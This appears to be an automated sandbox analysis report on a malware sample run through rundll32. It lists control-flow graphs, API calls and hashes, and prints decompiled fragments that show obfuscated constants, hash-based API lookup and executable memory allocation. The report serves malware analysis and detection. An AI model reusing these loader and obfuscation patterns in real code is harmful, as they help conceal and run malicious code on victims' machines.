                                                                      control_flow_graph 88 1beb40-1beb93 VirtualProtect 89 1beba6-1bec17 88->89 90 1beb95-1beba1 88->90 91 1bec3a-1bec85 call 1be7a0 call 1be7e0 89->91 107 1bec19-1bec37 89->107 90->91 99 1bec90-1bec9a 91->99 100 1becf8-1bed4a call 1be920 99->100 101 1bec9c-1beca3 99->101 111 1bed78-1bed7f 100->111 112 1bed4c-1bed50 100->112 104 1beced-1becf6 101->104 105 1beca5-1becac 101->105 104->99 105->104 106 1becae-1becea call 1be7e0 105->106 106->104 107->91 116 1bed8a-1bed94 111->116 112->111 115 1bed52-1bed75 call 1be880 112->115 115->111 118 1bede6-1bee1b call 1bf000 116->118 119 1bed96-1bed9d 116->119 122 1beddb-1bede4 119->122 123 1bed9f-1beda6 119->123 122->116 123->122 124 1beda8-1bedd9 call 1bee20 VirtualProtect 123->124 124->122
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001BEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001BEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_1a0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: d4ec2c4b8d7ca32284ee0ef8aadd8eaa76017fb165e723c9a8639b3d5767411f
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 61C18875A002099FCB48CF98C590EEEB7B6BF88314F148159E9199B355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 129 461a14-461a5a call 461ac8 135 461a70-461aa7 DdeCreateStringHandleA DdeNameService 129->135 136 461a5c-461a69 129->136 139 461aaf 135->139 136->135
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction ID: 9d8230b8b9786ad70cb23cfc8f07923e913d2bc7bc66b4dc0d7f0c12b5e74525
                                                                      • Opcode Fuzzy Hash: 2c890b520c8c8c453a459d838759a8254a88b7af164a4bc2f610b5fcdbda4da8
                                                                      • Instruction Fuzzy Hash: 5E1182717112545BCB11EAA5C882A4A37ACAF89B04B5405BAFD00EB296E678ED008799
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 140 407f4b-407ffd call 412550 call 407378 lstrcmpiW
                                                                      C-Code - Quality: 80%
                                                                      			E00407F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				void* _t35;
                                                                      				int _t43;
                                                                      				WCHAR* _t46;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t46 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00412550(_t35);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v32 = 0x71485a;
                                                                      				_v28 = 0x57c810;
                                                                      				_v20 = 0x2813;
                                                                      				_v20 = _v20 * 0x59;
                                                                      				_v20 = _v20 ^ 0x000dd428;
                                                                      				_v16 = 0xdb84;
                                                                      				_v16 = _v16 | 0xe2c96d38;
                                                                      				_v16 = _v16 ^ 0xe2c994d7;
                                                                      				_v12 = 0xc19e;
                                                                      				_v12 = _v12 >> 7;
                                                                      				_v12 = _v12 ^ 0x000060ae;
                                                                      				_v8 = 0x265e;
                                                                      				_v8 = _v8 + 0x315a;
                                                                      				_v8 = _v8 << 0xb;
                                                                      				_v8 = _v8 ^ 0x02bd94c0;
                                                                      				E00407378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
                                                                      				_t43 = lstrcmpiW(_t46, _a4); // executed
                                                                      				return _t43;
                                                                      			}













                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00407FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2095863133.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000B.00000002.2095877728.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: d902e23f6411a0c44fb82a2e6a8296566946c79d4f08726a750a0587d667c915
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: EC110FB6C00219BBDF00DFA4C94A8DEBFB4EF04318F108589E92466241D3B95B14DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 145 1be620-1be66b call 1bea10 148 1be67a-1be6aa call 1be390 VirtualAlloc 145->148 149 1be66d-1be677 call 1bea10 145->149 149->148
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001BE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_1a0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: c244dc4ca5502cf1a60d3aeeee32a4874eb2545764dc38a8e80cb46f571af093
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 6A110060D08289DAEF01D7E894097FEBFB55B21704F044098D5457B282D7BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 170 41b86e-41b949 call 412550 call 407378 CreateProcessW
                                                                      C-Code - Quality: 40%
                                                                      			E0041B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t49;
                                                                      				int _t58;
                                                                      				signed int _t60;
                                                                      				int _t65;
                                                                      
                                                                      				_push(_a68);
                                                                      				_t65 = __ecx;
                                                                      				_push(0);
                                                                      				_push(_a60);
                                                                      				_push(_a56);
                                                                      				_push(_a52);
                                                                      				_push(_a48);
                                                                      				_push(_a44);
                                                                      				_push(_a40);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(0);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00412550(_t49);
                                                                      				_v12 = 0xd1fa;
                                                                      				_t60 = 0x3c;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 >> 0xa;
                                                                      				_v12 = _v12 ^ 0x00001682;
                                                                      				_v20 = 0xd4c2;
                                                                      				_v20 = _v20 + 0x3986;
                                                                      				_v20 = _v20 ^ 0x00013905;
                                                                      				_v8 = 0x8c53;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 << 1;
                                                                      				_v8 = _v8 ^ 0x000060d6;
                                                                      				_v16 = 0x467b;
                                                                      				_v16 = _v16 + 0xffff2b71;
                                                                      				_v16 = _v16 ^ 0xffff105c;
                                                                      				E00407378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
                                                                      				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
                                                                      				return _t58;
                                                                      			}












                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0041B942
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2095863133.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000B.00000002.2095877728.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: 356f3b95ddaaa167dd82075bba60e0d4b8753b8399a247414e87281e072a6ffd
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 1121E672800248BBDF159F95CD09CDFBF79FF89714F008158FA1466160D7B69A60DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 175 40471a-4047ea call 412550 call 407378 SHGetFolderPathW
                                                                      C-Code - Quality: 58%
                                                                      			E0040471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t61;
                                                                      				void* _t62;
                                                                      				signed int _t63;
                                                                      				signed int _t64;
                                                                      
                                                                      				E00412550(_t50);
                                                                      				_v20 = 0xf336;
                                                                      				_v20 = _v20 + 0x29f7;
                                                                      				_v20 = _v20 ^ 0x000152a0;
                                                                      				_v8 = 0xc9c4;
                                                                      				_v8 = _v8 >> 0x10;
                                                                      				_v8 = _v8 << 3;
                                                                      				_t63 = 0x6d;
                                                                      				_v8 = _v8 * 0x43;
                                                                      				_v8 = _v8 ^ 0x0000467c;
                                                                      				_v16 = 0x763b;
                                                                      				_t64 = 0x2d;
                                                                      				_v16 = _v16 / _t63;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 ^ 0x000058e5;
                                                                      				_v12 = 0x527e;
                                                                      				_v12 = _v12 / _t64;
                                                                      				_v12 = _v12 | 0xd776a7a3;
                                                                      				_v12 = _v12 ^ 0xd776f938;
                                                                      				_t61 = E00407378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
                                                                      				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
                                                                      				return _t62;
                                                                      			}













                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 004047E4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2095863133.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000B.00000002.2095877728.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 65912959230b40fcbc033ffb5be77358307eff91cf09a66e6c6d15bb7c7ea9d8
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 27210372D01208FBEF15DFE5C94A8DEBBB5EF05354F108089E924A6250D3B99B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
                                                                      • Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
                                                                      • Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
                                                                      • Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
                                                                      • Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
                                                                      • Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
                                                                      • Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
                                                                      • Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      • Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
                                                                      • Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2095885964.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
                                                                      • Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:4.5%
                                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:268
                                                                      Total number of Limit Nodes:16

                                                                      Graph


                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 472 463928-4639b4 call 4479dc 477 4639b6 472->477 478 4639bd-4639cf GetEnhMetaFileA 472->478 477->478 480 4639d1 478->480 481 4639d8-4639ec 478->481 480->481 482 463a0e-463ac5 VirtualAlloc 481->482 483 4639ee-463a0c 481->483 491 463acf-463ada 482->491 483->482 492 463b21-463b33 491->492 493 463adc-463b1f 491->493 494 463b75-463bac 492->494 495 463b35-463b73 492->495 493->491 495->494 495->495
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      • Opcode ID: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction ID: 00c49ef07d34f105fcf4d433495aa085861750dc82918067735be55c91b233ef
                                                                      • Opcode Fuzzy Hash: e22b54ecca05a132c9bdd28d062780c987cbddd84d4ea645cdb20cae0e4ab026
                                                                      • Instruction Fuzzy Hash: 8561B5B0601A409FE740DF69ED86A0537A5F704309B12853AE589972B1FFF5A854CF4F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 497 4104c7-410565 call 407378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E004104C7() {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _t48;
                                                                      				signed int _t49;
                                                                      
                                                                      				_v8 = 0xb3b9;
                                                                      				_v8 = _v8 + 0x1dd8;
                                                                      				_v8 = _v8 >> 0xa;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 ^ 0x000002ef;
                                                                      				_v20 = 0x5082;
                                                                      				_t48 = 0xc;
                                                                      				_v20 = _v20 / _t48;
                                                                      				_v20 = _v20 ^ 0x00006c35;
                                                                      				_v12 = 0x710;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_t49 = 0x6d;
                                                                      				_v12 = _v12 / _t49;
                                                                      				_v12 = _v12 ^ 0x0000532a;
                                                                      				_v16 = 0x5a4c;
                                                                      				_v16 = _v16 ^ 0xca4a1f4d;
                                                                      				_v16 = _v16 ^ 0xca4a24cd;
                                                                      				E00407378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
                                                                      				ExitProcess(0);
                                                                      			}










                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 00410560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: 8a4a50fccc019cea45a05ef1885fd17a53ef087f713c54163174b183f339ab60
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 2311F771E0520CEBEB04DFE5D84AA9EBBB1EB50714F10C189E414A7284D7F96B54CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 526 409b5e-409c3f call 412550 call 407378 RtlAllocateHeap
                                                                      C-Code - Quality: 72%
                                                                      			E00409B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _v32;
                                                                      				intOrPtr _v36;
                                                                      				void* _t52;
                                                                      				void* _t68;
                                                                      				signed int _t70;
                                                                      				signed int _t71;
                                                                      				signed int _t72;
